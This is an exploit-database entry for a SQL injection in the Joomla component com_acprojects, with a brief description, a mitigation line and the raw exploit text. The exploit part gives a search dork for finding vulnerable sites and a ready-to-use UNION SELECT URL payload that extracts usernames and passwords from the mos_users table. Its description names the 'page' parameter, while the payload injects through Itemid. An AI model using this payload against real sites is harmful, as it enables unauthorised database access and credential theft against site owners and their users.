Joomla Component com_acprojects Sql Injection Vulnerability

vendor:

Joomla

by:

AtT4CKxT3rR0r1ST

CVSS

HIGH

SQL Injection

CWE

Product Name: Joomla

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component com_acprojects Sql Injection Vulnerability

A SQL injection vulnerability exists in the Joomla component com_acprojects. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability is due to the lack of proper input validation in the "page" parameter of the "index.php" script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request with a malicious SQL statement to the vulnerable script.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

Joomla Component com_acprojects Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Home : www.sec-attack.com/vb [Sec Attack Team]
.:. Bug Type : Sql Injection[Mysql]
.:. Dork : inurl:"com_acprojects"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_acprojects&page=7&Itemid=[SQL]&lang=de

www.site.com/index.php?option=com_acprojects&page=7&Itemid=null+and+1=2+union+select+1,2,concat(username,0x20,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users&lang=de


####################################################################